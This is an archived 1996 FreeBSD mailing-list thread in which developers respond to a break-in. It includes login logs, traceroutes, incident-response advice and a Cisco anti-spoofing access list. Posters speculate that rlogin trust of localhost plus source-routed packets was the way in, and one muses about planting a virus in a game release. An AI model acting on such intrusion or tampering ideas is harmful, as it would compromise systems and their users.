from bang.rain.com (bang.rain.com [204.119.8.73]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id WAA25082; Sun, 23 Jun 1996 22:38:38 -0700 (PDT) Received: (from john@localhost) by bang.rain.com (8.6.12/8.6.9) id WAA23685; Sun, 23 Jun 1996 22:38:21 -0700 From: John Cavanaugh Message-Id: <199606240538.WAA23685@bang.rain.com> Subject: Re: I need help on this one - please help me track this guy down! To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Sun, 23 Jun 1996 22:38:20 -0700 (PDT) Cc: hasty@rah.star-gate.com, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org In-Reply-To: <8378.835580425@time.cdrom.com> from "Jordan K. Hubbard" at Jun 23, 96 06:40:25 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > > Also since "you" were logged in , try to look in the logs for a > > a loggin session of a foreign host and I would report the incident to the > > FBI 8) > > All we have are the "last" logs, which show: > > jkh ttyp2 a235.pu.ru Sun Jun 23 16:50 - 17:18 (00:28) > jkh ttyp3 a235.pu.ru Sun Jun 23 15:00 - 15:34 (00:33) > > If someone at the russian site could help correlate this time (PST) to > the local time at wherever a235.ru.pu came in from, we could at least > narrow down which user(s) it might have been. > > Also, I think that calling the FBI on this one is only likely to get > me put on infinite hold when they hear that the perpetrator is in > Russia. :-) Maybe it's time to call Cliff Stoll. -- John Cavanaugh "There can be only one." From owner-freebsd-security Sun Jun 23 23:25:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA27306 for security-outgoing; Sun, 23 Jun 1996 23:25:50 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id XAA27291; Sun, 23 Jun 1996 23:25:45 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id IAA11793; Mon, 24 Jun 1996 08:25:33 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606240625.IAA11793@gvr.win.tue.nl> Subject: Re: I need help on this one - please help me track this guy down! To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Mon, 24 Jun 1996 08:25:32 +0200 (MET DST) Cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org In-Reply-To: <7979.835575935@time.cdrom.com> from "Jordan K. Hubbard" at "Jun 23, 96 05:25:35 pm" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > A traceroute from wcarchive doesn't show me much, but if anybody can > gleen some userful information out of it I'd appreciate it. > > Thanks! > > 5 Helsinki2.FI.EU.net (134.222.228.45) 555.687 ms 518.720 ms 507.602 ms > 6 StPetersburg.RU.EU.net (134.222.23.2) 549.172 ms 592.407 ms 630.928 ms > 7 spb-2-gw.spb.su (193.124.83.66) 547.190 ms 573.518 ms 569.656 ms > 8 hqlgu-LE.pu.ru (193.124.255.134) 519.318 ms 657.805 ms 651.496 ms > 9 slip-0.pu.ru (193.124.85.1) 840.489 ms 671.729 ms 650.750 ms > 10 nat.pu.ru (193.124.85.134) 638.649 ms 653.720 ms 720.170 ms > 11 gw.pu.ru (193.124.85.219) 752.144 ms 645.046 ms 641.413 ms > 12 localhost (127.0.0.1) 670.113 ms 702.233 ms 695.733 ms > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Do you have anti-spoof filter rules in your backbone router? If not install them. If so, please add packets coming in from localhost to them. I don't know why he got in, but you can suspect rlogin plus a localhost entry in host.equiv combined with source routed packets. In general it is a bad idea to trust localhost, as this is a reletaive ip address. Unless of course you either block packets coming from localhost or block source routed packets. -Guido From owner-freebsd-security Sun Jun 23 23:29:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA27632 for security-outgoing; Sun, 23 Jun 1996 23:29:43 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA27622; Sun, 23 Jun 1996 23:29:38 -0700 (PDT) Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id XAA10328; Sun, 23 Jun 1996 23:29:31 -0700 (PDT) To: guido@gvr.win.tue.nl (Guido van Rooij) cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 08:25:32 +0200." <199606240625.IAA11793@gvr.win.tue.nl> Date: Sun, 23 Jun 1996 23:29:30 -0700 Message-ID: <10326.835597770@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Do you have anti-spoof filter rules in your backbone router? If not > install them. If so, please add packets coming in from localhost How do you install such things on a cisco 2500? :-) Seriously, if there's a way then I can get someone from cisco to help me out, but I first need to know that it's even a reasonable request. > to them. I don't know why he got in, but you can suspect rlogin plus > a localhost entry in host.equiv combined with source routed packets. Hmmm. We have reason to believe that he *didn't* get root (though we're still assuming he did, just to be paranoid) and if the mod times can be trusted, hosts.equiv hasn't been touched in many months (and localhost is commented out). Jordan From owner-freebsd-security Sun Jun 23 23:35:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA27978 for security-outgoing; Sun, 23 Jun 1996 23:35:04 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA27973; Sun, 23 Jun 1996 23:35:01 -0700 (PDT) Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id XAA10348; Sun, 23 Jun 1996 23:34:53 -0700 (PDT) To: guido@gvr.win.tue.nl (Guido van Rooij) cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 08:25:32 +0200." <199606240625.IAA11793@gvr.win.tue.nl> Date: Sun, 23 Jun 1996 23:34:53 -0700 Message-ID: <10346.835598093@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > ip address. Unless of course you either block packets coming from localhost > or block source routed packets. Oh yeah, also, David says both we and CRL (the ISP) block source routed packets. Jordan From owner-freebsd-security Sun Jun 23 23:56:22 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA28785 for security-outgoing; Sun, 23 Jun 1996 23:56:22 -0700 (PDT) Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id XAA28779; Sun, 23 Jun 1996 23:56:19 -0700 (PDT) Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id XAA27306; Sun, 23 Jun 1996 23:51:37 -0700 From: Terry Lambert Message-Id: <199606240651.XAA27306@phaeton.artisoft.com> Subject: Re: I need help on this one - please help me track this guy down! To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Sun, 23 Jun 1996 23:51:37 -0700 (MST) Cc: guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org In-Reply-To: <10326.835597770@time.cdrom.com> from "Jordan K. Hubbard" at Jun 23, 96 11:29:30 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Hmmm. We have reason to believe that he *didn't* get root (though > we're still assuming he did, just to be paranoid) and if the mod times > can be trusted, hosts.equiv hasn't been touched in many months (and > localhost is commented out). 1) Do not believe this. Assume he got root. 2) Assume your password changes are mailed out as cleartext by your passwd program. 3) Assumed md5 and checksum have been hacked to lie about themselves and any other files affected. 4) Assume system time stamps were changed. 5) Assume all log files were edited. 6) Best approach: reinstall the system (from distribution, not backup --- no telling how long he was there). 7) Turn off the stupid "password must meet these criteria" on the password change. All it does is reduce the search space a hacker needs to apply. 8) Put spoofing filters on your firewall; basically, look for the response bit. 9) Make sure you aren't running routed -q. 10) Turn of source routing on your gateway, if it's on. If you need help getting the FBI involved, tell them you had "munitions" on the machine. ;-). Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. From owner-freebsd-security Mon Jun 24 00:36:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA01302 for security-outgoing; Mon, 24 Jun 1996 00:36:40 -0700 (PDT) Received: from einstein.technet.sg (ngps@einstein.technet.sg [192.169.33.50]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA01282; Mon, 24 Jun 1996 00:36:29 -0700 (PDT) Received: (from ngps@localhost) by einstein.technet.sg (8.7.3/8.6.9) id PAA17929; Mon, 24 Jun 1996 15:35:02 +0800 (SST) Date: Mon, 24 Jun 1996 15:35:01 +0800 (SST) From: Ng Pheng Siong To: Terry Lambert cc: "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606240651.XAA27306@phaeton.artisoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Sun, 23 Jun 1996, Terry Lambert wrote: > 1) Do not believe this. Assume he got root. Fundamental question: how did the intruder get in? Telnet with reuseable passwords, or something else? Note that the intruder is probably reading these lists. ;) - PS -- Ng Pheng Siong * Finger for PGP key. Pacific Internet Pte Ltd * Singapore Fast, secure, cheap. Pick two. From owner-freebsd-security Mon Jun 24 01:22:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA03701 for security-outgoing; Mon, 24 Jun 1996 01:22:40 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA03693; Mon, 24 Jun 1996 01:22:33 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id KAA12148; Mon, 24 Jun 1996 10:22:12 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606240822.KAA12148@gvr.win.tue.nl> Subject: Re: I need help on this one - please help me track this guy down! To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Mon, 24 Jun 1996 10:22:12 +0200 (MET DST) Cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org In-Reply-To: <10326.835597770@time.cdrom.com> from "Jordan K. Hubbard" at "Jun 23, 96 11:29:30 pm" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Jordan K. Hubbard wrote: > > Do you have anti-spoof filter rules in your backbone router? If not > > install them. If so, please add packets coming in from localhost > > How do you install such things on a cisco 2500? :-) Seriously, if > there's a way then I can get someone from cisco to help me out, but I > first need to know that it's even a reasonable request. Put an access group *in*. On the interface to your ISP. Deny all packets originating from ip numbers on your internal network. Allow anything else. > > > to them. I don't know why he got in, but you can suspect rlogin plus > > a localhost entry in host.equiv combined with source routed packets. > > Hmmm. We have reason to believe that he *didn't* get root (though > we're still assuming he did, just to be paranoid) and if the mod times > can be trusted, hosts.equiv hasn't been touched in many months (and > localhost is commented out). Okay. Than this was not the problem. -Guido From owner-freebsd-security Mon Jun 24 02:38:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA10597 for security-outgoing; Mon, 24 Jun 1996 02:38:55 -0700 (PDT) Received: from minnow.render.com (render.demon.co.uk [158.152.30.118]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id CAA10557; Mon, 24 Jun 1996 02:38:42 -0700 (PDT) Received: (from dfr@localhost) by minnow.render.com (8.6.12/8.6.9) id KAA26539; Mon, 24 Jun 1996 10:41:27 +0100 Date: Mon, 24 Jun 1996 10:41:26 +0100 (BST) From: Doug Rabson To: "Jordan K. Hubbard" cc: Amancio Hasty , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <8378.835580425@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 23 Jun 1996, Jordan K. Hubbard wrote: > > Also since "you" were logged in , try to look in the logs for a > > a loggin session of a foreign host and I would report the incident to the > > FBI 8) > > All we have are the "last" logs, which show: > > jkh ttyp2 a235.pu.ru Sun Jun 23 16:50 - 17:18 (00:28) > jkh ttyp3 a235.pu.ru Sun Jun 23 15:00 - 15:34 (00:33) > > If someone at the russian site could help correlate this time (PST) to > the local time at wherever a235.ru.pu came in from, we could at least > narrow down which user(s) it might have been. > > Also, I think that calling the FBI on this one is only likely to get > me put on infinite hold when they hear that the perpetrator is in > Russia. :-) Which parts of the archive do you have write access to? It just occurred to me that inserting a virus into the release version of quake would be a far more devastating attack than tampering with a FreeBSD release. -- Doug Rabson, Microsoft RenderMorphics Ltd. Mail: dfr@render.com Phone: +44 171 251 4411 FAX: +44 171 251 0939 From owner-freebsd-security Mon Jun 24 02:49:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA11802 for security-outgoing; Mon, 24 Jun 1996 02:49:35 -0700 (PDT) Received: from rah.star-gate.com (rah.star-gate.com [204.188.121.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA11792; Mon, 24 Jun 1996 02:49:29 -0700 (PDT) Received: from rah.star-gate.com (localhost.v-site.net [127.0.0.1]) by rah.star-gate.com (8.7.5/8.7.3) with ESMTP id CAA00862; Mon, 24 Jun 1996 02:48:40 -0700 (PDT) Message-Id: <199606240948.CAA00862@rah.star-gate.com> X-Mailer: exmh version 1.6.5 12/11/95 To: Doug Rabson cc: "Jordan K. Hubbard" , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 10:41:26 BST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 24 Jun 1996 02:48:40 -0700 From: Amancio Hasty Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Hmmm... voluntary shutdown, till you can examine, rebuild freebsd.org? Specially since the intruder wiped out the home directory... Amancio >From The Desk Of Doug Rabson : > On Sun, 23 Jun 1996, Jordan K. Hubbard wrote: > > > Which parts of the archive do you have write access to? It just occurred > to me that inserting a virus into the release version of quake would be a > far more devastating attack than tampering with a FreeBSD release. > From owner-freebsd-security Mon Jun 24 03:07:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA11802 for security-outgoing; Mon, 24 Jun 1996 02:49:35 -0700 (PDT) Received: from rah.star-gate.com (rah.star-gate.com [204.188.121.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA11792; Mon, 24 Jun 1996 02:49:29 -0700 (PDT) Received: from rah.star-gate.com (localhost.v-site.net [127.0.0.1]) by rah.star-gate.com (8.7.5/8.7.3) with ESMTP id CAA00862; Mon, 24 Jun 1996 02:48:40 -0700 (PDT) Message-Id: <199606240948.CAA00862@rah.star-gate.com> X-Mailer: exmh version 1.6.5 12/11/95 To: Doug Rabson cc: "Jordan K. Hubbard" , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 10:41:26 BST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 24 Jun 1996 02:48:40 -0700 From: Amancio Hasty Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Hmmm... voluntary shutdown, till you can examine, rebuild freebsd.org? Specially since the intruder wiped out the home directory... Amancio >From The Desk Of Doug Rabson : > On Sun, 23 Jun 1996, Jordan K. Hubbard wrote: > > > Which parts of the archive do you have write access to? It just occurred > to me that inserting a virus into the release version of quake would be a > far more devastating attack than tampering with a FreeBSD release. > From owner-freebsd-security Mon Jun 24 03:17:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA01850 for security-outgoing; Mon, 24 Jun 1996 03:17:32 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA01844; Mon, 24 Jun 1996 03:17:29 -0700 (PDT) Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id DAA11150; Mon, 24 Jun 1996 03:15:51 -0700 (PDT) To: Ng Pheng Siong cc: Terry Lambert , guido@gvr.win.tue.nl, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 15:35:01 +0800." Date: Mon, 24 Jun 1996 03:15:51 -0700 Message-ID: <11148.835611351@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk We're pretty sure we know how he got in at this point but I'm going to refrain from saying anything until we have had a chance to talk with the FreeBSD security officers about this incident. Jordan > On Sun, 23 Jun 1996, Terry Lambert wrote: > > 1) Do not believe this. Assume he got root. > > Fundamental question: how did the intruder get in? Telnet with reuseable > passwords, or something else? > > Note that the intruder is probably reading these lists. ;) > > - PS > -- > Ng Pheng Siong * Finger for PGP key. > Pacific Internet Pte Ltd * Singapore > > Fast, secure, cheap. Pick two. > From owner-freebsd-security Mon Jun 24 03:32:14 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA02889 for security-outgoing; Mon, 24 Jun 1996 03:32:14 -0700 (PDT) Received: from root.com (implode.root.com [198.145.90.17]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA02882; Mon, 24 Jun 1996 03:32:12 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by root.com (8.7.5/8.6.5) with SMTP id DAA13003; Mon, 24 Jun 1996 03:31:49 -0700 (PDT) Message-Id: <199606241031.DAA13003@root.com> X-Authentication-Warning: implode.root.com: Host localhost [127.0.0.1] didn't use HELO protocol To: Doug Rabson cc: "Jordan K. Hubbard" , Amancio Hasty , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 10:41:26 BST." From: David Greenman Reply-To: davidg@root.com Date: Mon, 24 Jun 1996 03:31:48 -0700 Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk >Which parts of the archive do you have write access to? It just occurred >to me that inserting a virus into the release version of quake would be a >far more devastating attack than tampering with a FreeBSD release. Based on what I've discovered at this point, I don't think this has occurred. We're not going to discuss this issue in public any further. If you have any ideas or advice, please send it to Jordan and me. Thanks. -DG David Greenman Core-team/Principal Architect, The FreeBSD Project From owner-freebsd-security Mon Jun 24 03:49:18 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA03610 for security-outgoing; Mon, 24 Jun 1996 03:49:18 -0700 (PDT) Received: from shogun.tdktca.com ([206.26.1.21]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA03605; Mon, 24 Jun 1996 03:49:15 -0700 (PDT) Received: from shogun.tdktca.com (daemon@localhost) by shogun.tdktca.com (8.7.2/8.7.2) with ESMTP id FAA13845; Mon, 24 Jun 1996 05:50:35 -0500 (CDT) Received: from orion.fa.tdktca.com ([163.49.131.130]) by shogun.tdktca.com (8.7.2/8.7.2) with SMTP id FAA13840; Mon, 24 Jun 1996 05:50:34 -0500 (CDT) Received: from orion (alex@localhost [127.0.0.1]) by orion.fa.tdktca.com (8.6.12/8.6.9) with SMTP id FAA15083; Mon, 24 Jun 1996 05:52:57 -0500 Message-ID: <31CE7387.C50A843@fa.tdktca.com> Date: Mon, 24 Jun 1996 05:52:55 -0500 From: Alex Nash Organization: TDK Factory Automation X-Mailer: Mozilla 2.0 (X11; I; Linux 1.2.13 i586) MIME-Version: 1.0 To: "Jordan K. Hubbard" CC: Ng Pheng Siong , Terry Lambert , guido@gvr.win.tue.nl, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG Subject: Re: I need help on this one - please help me track this guy down! References: <11148.835611351@time.cdrom.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Jordan K. Hubbard wrote: > > We're pretty sure we know how he got in at this point but I'm going > to refrain from saying anything until we have had a chance to talk > with the FreeBSD security officers about this incident. > > Jordan > > > On Sun, 23 Jun 1996, Terry Lambert wrote: > > > 1) Do not believe this. Assume he got root. > > > > Fundamental question: how did the intruder get in? Telnet with reuseable > > passwords, or something else? > > > > Note that the intruder is probably reading these lists. ;) Well not only do you know how he got in, but if he really is reading these lists, we've got our man (or woman, as the case may be). There's only one user from pu.ru on the combined hackers/security lists. :) Disclaimer: I'm kidding, I would not point the finger at this person based on such circumstantial evidence. Alex From owner-freebsd-security Mon Jun 24 03:55:25 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA03960 for security-outgoing; Mon, 24 Jun 1996 03:55:25 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA03949; Mon, 24 Jun 1996 03:55:23 -0700 (PDT) Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id DAA11301; Mon, 24 Jun 1996 03:55:06 -0700 (PDT) To: Amancio Hasty cc: Doug Rabson , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 02:48:40 PDT." <199606240948.CAA00862@rah.star-gate.com> Date: Mon, 24 Jun 1996 03:55:05 -0700 Message-ID: <11299.835613705@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Already in progress, yep! > > Hmmm... voluntary shutdown, till you can examine, rebuild freebsd.org? > Specially since the intruder wiped out the home directory... > > Amancio > > >From The Desk Of Doug Rabson : > > On Sun, 23 Jun 1996, Jordan K. Hubbard wrote: > > > > > > Which parts of the archive do you have write access to? It just occurred > > to me that inserting a virus into the release version of quake would be a > > far more devastating attack than tampering with a FreeBSD release. > > > > > From owner-freebsd-security Mon Jun 24 05:46:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA18365 for security-outgoing; Mon, 24 Jun 1996 05:46:04 -0700 (PDT) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.eu.org [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id FAA18344; Mon, 24 Jun 1996 05:45:57 -0700 (PDT) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.eu.org [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id OAA06092; Mon, 24 Jun 1996 14:45:53 +0200 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id OAA14741; Mon, 24 Jun 1996 14:45:38 +0200 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.Alpha.5/keltia-uucp-2.8) id NAA09908; Mon, 24 Jun 1996 13:43:56 +0200 (MET DST) From: Ollivier Robert Message-Id: <199606241143.NAA09908@keltia.freenix.fr> Subject: Re: I need help on this one - please help me track this guy down! To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Mon, 24 Jun 1996 13:43:56 +0200 (MET DST) Cc: guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org In-Reply-To: <10326.835597770@time.cdrom.com> from "Jordan K. Hubbard" at "Jun 23, 96 11:29:30 pm" X-Operating-System: FreeBSD 2.2-CURRENT ctm#2111 X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk It seems that Jordan K. Hubbard said: > How do you install such things on a cisco 2500? :-) Seriously, if > there's a way then I can get someone from cisco to help me out, but I > first need to know that it's even a reasonable request. If you use Serial0 for the Internet and A.B.C.0/24 in your internal network, use something like the following: ! ! Refuses loose/strict source routed packets ! no ip source-route ! interface Serial0 ip address A.B.C.254 255.255.255.0 ip access-g 100 in ip access-g 101 out ... ! access list for incoming packets ! should fix most of the new attacks when a spoofed packet ! is trying to come from the outside with a source address ! from our network which is impossible. ! no access-list 100 ! ! Rejects our own addresses C-Class A.B.C.0/24 ! access-list 100 deny ip A.B.C.0 0.0.0.255 any ! ! Rejects EPITA B-Class 163.5.0.0/16 ! access-list 100 deny ip 163.5.0.0 0.0.255.255 any ! ! Rejects special addresses ! access-list 100 deny ip 127.0.0.0 0.255.255.255 any ! ! RFC-1918 IANA reserved A/B/C classes ! A-Class 10.0.0.0/8 ! access-list 100 deny ip 10.0.0.0 0.255.255.255 any ! ! B-Classes 172.16.0.0/12 ! access-list 100 deny ip 172.16.0.0 0.15.255.255 any ! ! C-Classes 192.168.0.0/16 ! access-list 100 deny ip 192.168.0.0 0.0.255.255 any ! ! Accepts the rest ! access-list 100 permit ip any A.B.C.0 0.0.0.255 -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 2.2-CURRENT #11: Thu Jun 13 11:01:47 MET DST 1996 From owner-freebsd-security Mon Jun 24 05:48:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA18531 for security-outgoing; Mon, 24 Jun 1996 05:48:07 -0700 (PDT) Received: from irz301.inf.tu-dresden.de (irz301.inf.tu-dresden.de [141.76.1.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id FAA18484; Mon, 24 Jun 1996 05:47:52 -0700 (PDT) Received: from sax.sax.de by irz301.inf.tu-dresden.de (8.6.12/8.6.12-s1) with ESMTP id IAA29110; Mon, 24 Jun 1996 08:51:12 +0200 Received: (from uucp@localhost) by sax.sax.de (8.6.12/8.6.12-s1) with UUCP id IAA15569; Mon, 24 Jun 1996 08:51:11 +0200 Received: (from j@localhost) by uriah.heep.sax.de (8.7.5/8.6.9) id IAA12290; Mon, 24 Jun 1996 08:25:07 +0200 (MET DST) From: J Wunsch Message-Id: <199606240625.IAA12290@uriah.heep.sax.de> Subject: Re: I need help on this one - please help me track this guy down! To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Mon, 24 Jun 1996 08:25:06 +0200 (MET DST) Cc: msmith@atrad.adelaide.edu.au, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Reply-To: joerg_wunsch@uriah.heep.sax.de (Joerg Wunsch) In-Reply-To: <9123.835587998@time.cdrom.com> from "Jordan K. Hubbard" at "Jun 23, 96 08:46:38 pm" X-Phone: +49-351-2012 669 X-PGP-Fingerprint: DC 47 E6 E4 FF A6 E9 8F 93 21 E0 7D F9 12 D6 4E X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk As Jordan K. Hubbard wrote: > [jaeger@com removed from cc - he needs to fix his headers :-)] While we are at it, wasn't `jaeger' on of the nicknames of the intruder in Stoll's ``The Cuckoo's egg''? :-} -- cheers, J"org joerg_wunsch@uriah.heep.sax.de -- http://www.sax.de/~joerg/ -- NIC: JW11-RIPE Never trust an operating system you don't have sources for. ;-) From owner-freebsd-security Mon Jun 24 06:48:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id GAA21730 for security-outgoing; Mon, 24 Jun 1996 06:48:48 -0700 (PDT) Received: from horst.bfd.com (horst.bfd.com [204.160.242.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id GAA21725 for ; Mon, 24 Jun 1996 06:48:46 -0700 (PDT) Received: from harlie.bfd.com (bastion.bfd.com [204.160.242.2]) by horst.bfd.com (8.7.5/8.7.3) with SMTP id GAA13631; Mon, 24 Jun 1996 06:48:41 -0700 (PDT) Date: Mon, 24 Jun 1996 06:48:42 -0700 (PDT) From: "Eric J. Schwertfeger" To: "Jordan K. Hubbard" cc: Guido van Rooij , security@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <10326.835597770@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: 